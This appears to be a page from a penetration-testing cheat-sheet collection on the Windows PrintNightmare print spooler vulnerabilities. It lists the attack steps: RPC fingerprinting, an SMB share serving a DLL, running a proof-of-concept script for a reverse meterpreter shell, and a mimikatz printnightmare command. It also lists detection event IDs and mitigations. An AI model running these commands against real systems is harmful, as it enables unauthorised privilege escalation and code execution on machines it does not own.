killchain-compendium/Exploits/Windows/Further PrintNightmare.md

1.7 KiB

Print Nightmare

  • Privilege Escalation using Print Spooler Service
  • Located at C:\Windows\System32\spoolsv.exe
  • Enabled by default
  • CVE-2021-1675 (locally exploitable) and CVE-2021-34527 (RCE) are both related to the print spooler
  • RCE connection is done via DCE/RPC. Use of RpcAddPrinterDriver or RpcAddPrinterDriverEx

Usage

  • Prepare reverse shell
  • Check if target would be vulnerable
rpcdump.py @$TARGET_IP | grep -e 'MS-RPRN|MS-PAR'
  • Execute smb server
smbserver.py share . -smb2support
  • Execute PoC with credentials to elevate
python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP
  • Use the meterpreter session

Mimikatz

  • Printnightmare modules of mimikatz
misc::printnightmare /target:<domain.com> /authuser:<lowpriv_user> /authpassword:<password> /library:\\<domain.com>\path\to\printnightmare.dll

IOCs

  • pcAddPrinterDriverEx() is called

  • Sygnia explains them

  • Splunk queries

  • Logs are Microsoft-Windows-PrintService/Admin and Microsoft-Windows-PrintService/Operational

  • Event Ids 316, 808, 811, 31017, 7031

Mitigation

  • link
  • Stop and disable
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
  • Disable group policy
Computer Configuration/Administrative Templates/Printers